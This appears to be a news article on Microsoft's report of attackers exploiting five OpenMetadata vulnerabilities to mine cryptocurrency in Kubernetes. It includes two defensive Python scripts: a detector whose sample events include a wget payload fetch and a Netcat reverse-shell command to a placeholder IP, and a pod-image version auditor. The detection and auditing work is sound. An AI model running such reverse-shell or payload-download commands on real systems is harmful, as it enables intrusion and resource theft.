Microsoft Warns: Cybercriminals Exploit OpenMetadata Flaws to Mine Cryptocurrency

Apr 19, 2024 at 05:53 am

Unpatched OpenMetadata vulnerabilities, disclosed in March, are being actively exploited by malicious actors to gain access to Kubernetes environments and install crypto-mining malware. These vulnerabilities allow attackers to bypass authentication, gain remote code execution, and steal AWS credentials to mine cryptocurrency on victims' resources. Microsoft recommends administrators update OpenMetadata images to the latest version and implement strong authentication to mitigate these risks.

Cybercriminals Exploit OpenMetadata Vulnerabilities to Mine Cryptocurrency, Microsoft Warns

Microsoft has reported that cybercriminals are actively exploiting vulnerabilities in OpenMetadata, an open-source metadata management and data-discovery platform, to mine cryptocurrency on their victims' infrastructure. The exploitation, observed since early April, targets Kubernetes environments where OpenMetadata is deployed without the security patches released in March.

Unpatched OpenMetadata Systems: A Gateway for Malicious Actors

The OpenMetadata vulnerabilities disclosed in March are a set of critical and high-severity flaws that, chained together, let an unauthenticated attacker bypass authentication and obtain remote code execution (RCE) inside an OpenMetadata deployment. Microsoft's threat intelligence team identified five CVEs being used in these attacks:

  • CVE-2024-28255: Critical improper authentication vulnerability (CVSS: 9.8)
  • CVE-2024-28847: High-severity code-injection vulnerability (CVSS: 8.8)
  • CVE-2024-28253: Critical code-injection vulnerability (CVSS: 9.4)
  • CVE-2024-28848: High-severity code-injection vulnerability (CVSS: 8.8)
  • CVE-2024-28254: High-severity OS command injection vulnerability (CVSS: 8.8)

Together these flaws give an attacker a path from the internet to code execution inside the OpenMetadata container. In the observed campaign, the attackers' primary objective is to mine cryptocurrency on the victims' computing resources without being noticed.

The Attack Sequence: A Step-by-Step Account

The attack sequence begins with attackers scanning for Kubernetes-based deployments of OpenMetadata that are exposed to the internet. Once they identify vulnerable systems, they exploit the unpatched CVEs to gain access to the container. From there, they execute a series of commands to gather intelligence about the victim's environment, including network and hardware configuration, OS version, and active users.

"As part of the reconnaissance phase, the attackers read the environment variables of the workload," explained Microsoft security experts Hagai Ran Kestenberg and Yossi Weizman. "Those variables may contain connection strings and credentials for various services used for OpenMetadata operation, which could lead to lateral movement to additional resources."

Crypto-Malware Deployment and Remote Access

Once they have a foothold, the attackers download cryptomining malware from a remote server located in China. In some cases they also leave behind a note asking their victims for sympathy (and Monero):

"Hi man. I've seen several organizations report my Trojan recently. Please let me go. I want to buy a car. That's all. I don't want to hurt others. I can't help it. My family is very poor. In China, it's hard to buy a suite. I don't have any accommodation. I don't want to do anything illegal. Really, really if you are interested, you can give me XMR, my address is…"

It remains unclear whether this story has persuaded any victims to send Monero (XMR) to the attackers.

After deploying the miner, the attackers open a reverse shell to a remote server using Netcat, giving them interactive remote access to the container. They also install cronjobs so that the malware is re-executed on a schedule, which keeps it running if the original process is killed.
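The chain described above (reconnaissance, environment-variable harvesting, payload download, Netcat reverse shell, cron persistence) is easier to detect as a sequence than as isolated commands, since any one of them is ordinary in a container. The following is an added example, not Microsoft's or OpenMetadata's code, that correlates process-exec events per container and flags a container once several stages of the chain appear in it. The event shape (a dict with pod, container and the executed command line) and the sample events are constructed assumptions standing in for whatever your runtime sensor emits; 203.0.113.0/24 is the RFC 5737 documentation range.

```python
"""Correlate container process-exec events against the OpenMetadata
cryptomining chain: recon -> env-var read -> download -> Netcat reverse
shell -> cron persistence.

Added example; not Microsoft's or OpenMetadata's code. The event format is
an assumption: one dict per executed command with pod, container, cmdline.
"""
import re

# One regex per stage of the chain. A single stage is weak evidence (curl on
# its own is normal); several stages in the same container is the signal.
RULES = {
    "recon": re.compile(
        r"(^|[;&|\s])(uname -a|whoami|lscpu|ip addr|cat /etc/os-release)\b"),
    "env_read": re.compile(
        r"(^|[;&|\s])(env|printenv)\b|/proc/(self|\d+)/environ"),
    "download": re.compile(r"\b(curl|wget)\b[^|;&]*https?://"),
    "reverse_shell": re.compile(
        r"\b(nc|ncat|netcat)\b.*(-e\s*/bin/(ba)?sh|\d{1,3}(\.\d{1,3}){3}\s+\d{2,5})"),
    "cron_persist": re.compile(r"\bcrontab\b|/etc/cron|/var/spool/cron"),
}

# Constructed sample events: an OpenMetadata container showing the full
# chain, and a web container doing a routine health check.
SAMPLE_EVENTS = [
    {"pod": "openmetadata-0", "container": "openmetadata", "cmdline": "uname -a"},
    {"pod": "openmetadata-0", "container": "openmetadata", "cmdline": "cat /etc/os-release"},
    {"pod": "openmetadata-0", "container": "openmetadata", "cmdline": "printenv"},
    {"pod": "openmetadata-0", "container": "openmetadata",
     "cmdline": "wget -q -O /tmp/.x http://203.0.113.10/x"},
    {"pod": "openmetadata-0", "container": "openmetadata",
     "cmdline": "nc 203.0.113.10 4444 -e /bin/sh"},
    {"pod": "openmetadata-0", "container": "openmetadata", "cmdline": "crontab /tmp/.x.cron"},
    {"pod": "web-7c9d", "container": "nginx",
     "cmdline": "curl -sf https://status.example.internal/healthz"},
    {"pod": "web-7c9d", "container": "nginx", "cmdline": "nginx -s reload"},
]


def classify(cmdline):
    """Return the set of chain stages a single command line matches."""
    return {stage for stage, rx in RULES.items() if rx.search(cmdline)}


def correlate(events):
    """Accumulate matched stages per (pod, container)."""
    stages = {}
    for ev in events:
        hit = classify(ev["cmdline"])
        if hit:
            stages.setdefault((ev["pod"], ev["container"]), set()).update(hit)
    return stages


def flag(events, min_stages=3):
    """Containers whose activity covers at least min_stages distinct stages."""
    return sorted(key for key, s in correlate(events).items() if len(s) >= min_stages)


if __name__ == "__main__":
    for (pod, container), s in correlate(SAMPLE_EVENTS).items():
        print(f"{pod}/{container}: {sorted(s)}")
    print("flagged:", flag(SAMPLE_EVENTS))
```

The threshold of three stages is a starting point, not a tuned value: the health-check container matches only the download stage and is not flagged, while the OpenMetadata container matches all five. In practice the reverse-shell and cron stages deserve an alert on their own in a workload that should never spawn a shell.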

Protecting Against Crypto-Mining Exploits

Microsoft strongly urges administrators running OpenMetadata workloads in their Kubernetes clusters to ensure that the image is up to date, meaning OpenMetadata 1.3.1 or later, the release that fixed the five CVEs listed above. If OpenMetadata is exposed to the internet, it should sit behind strong authentication, and default credentials must be changed. Because the attackers read the workload's environment variables during reconnaissance, any deployment that was reachable while unpatched should also treat the connection strings and service credentials stored there as compromised and rotate them.
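Checking that every OpenMetadata image in a cluster is at or above the fixed version is a one-pass walk over `kubectl get pods -A -o json`. The script below is an added example, not Microsoft's or OpenMetadata's code. It assumes the upstream image naming (a repository ending in `openmetadata/server`, as on Docker Hub and `docker.getcollate.io`) and that 1.3.1 is the fix version; adjust both for mirrored or renamed images. The pod list is constructed inline so the example runs offline.

```python
"""Audit pod specs for OpenMetadata server images older than the fixed release.

Added example; not Microsoft's or OpenMetadata's code. Assumptions: the
server image repository ends in 'openmetadata/server' (upstream naming) and
OpenMetadata 1.3.1 is the release that fixed the five CVEs.
"""
import json

FIXED_VERSION = (1, 3, 1)


def parse_image(image):
    """Split 'registry[:port]/repo[:tag][@digest]' into (repo, tag).
    tag is None when the image is untagged or pinned only by digest."""
    ref = image.split("@", 1)[0]
    slash, colon = ref.rfind("/"), ref.rfind(":")
    if colon > slash:          # a ':' after the last '/' is the tag, not a registry port
        return ref[:colon], ref[colon + 1:]
    return ref, None


def parse_version(tag):
    """'1.3.1' -> (1, 3, 1); 'v1.3' -> (1, 3, 0); 'latest' or None -> None."""
    if tag is None:
        return None
    core = tag.lstrip("v").split("-", 1)[0]
    try:
        ver = tuple(int(p) for p in core.split("."))
    except ValueError:
        return None
    return (ver + (0, 0, 0))[:3]


def is_openmetadata_server(repo):
    # Assumption: upstream naming. The ingestion image is a different
    # component and is deliberately not matched here.
    return "openmetadata" in repo and repo.rsplit("/", 1)[-1] == "server"


def audit(pod_list):
    """Walk a `kubectl get pods -A -o json` document and return one finding
    per OpenMetadata server container: vulnerable, patched, or unknown."""
    findings = []
    for pod in pod_list["items"]:
        spec = pod["spec"]
        for c in spec.get("containers", []) + spec.get("initContainers", []):
            repo, tag = parse_image(c["image"])
            if not is_openmetadata_server(repo):
                continue
            ver = parse_version(tag)
            if ver is None:
                status = "unknown"       # 'latest' or digest-only: cannot prove it is patched
            elif ver < FIXED_VERSION:
                status = "vulnerable"
            else:
                status = "patched"
            findings.append({
                "namespace": pod["metadata"]["namespace"],
                "pod": pod["metadata"]["name"],
                "container": c["name"],
                "image": c["image"],
                "status": status,
            })
    return findings


# Constructed sample in the shape of `kubectl get pods -A -o json`.
SAMPLE_PODS = {"items": [
    {"metadata": {"namespace": "data", "name": "openmetadata-server-0"},
     "spec": {"containers": [{"name": "openmetadata",
                              "image": "docker.getcollate.io/openmetadata/server:1.3.0"}]}},
    {"metadata": {"namespace": "data", "name": "openmetadata-ingestion-0"},
     "spec": {"containers": [{"name": "ingestion", "image": "openmetadata/ingestion:1.3.0"}]}},
    {"metadata": {"namespace": "data-staging", "name": "openmetadata-server-0"},
     "spec": {"containers": [{"name": "openmetadata", "image": "openmetadata/server:latest"}]}},
    {"metadata": {"namespace": "data-prod", "name": "openmetadata-server-0"},
     "spec": {"containers": [{"name": "openmetadata",
                              "image": "registry.example.internal:5000/mirrors/openmetadata/server:1.3.1"
                                       "@sha256:" + "0" * 64}]}},
    {"metadata": {"namespace": "web", "name": "nginx-7c9d"},
     "spec": {"containers": [{"name": "nginx", "image": "nginx:1.25"}]}},
]}


if __name__ == "__main__":
    print(json.dumps(audit(SAMPLE_PODS), indent=2))
```

A `latest` tag is reported as unknown rather than patched on purpose: the node may have pulled it before 1.3.1 existed, so only an explicit tag or a digest you can map to a release proves the fix is present.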

These vulnerabilities serve as a sobering reminder of the importance of timely security patching and the consequences of neglecting software updates. Organizations are advised to adopt a proactive approach to vulnerability management to mitigate the risks posed by malicious actors.
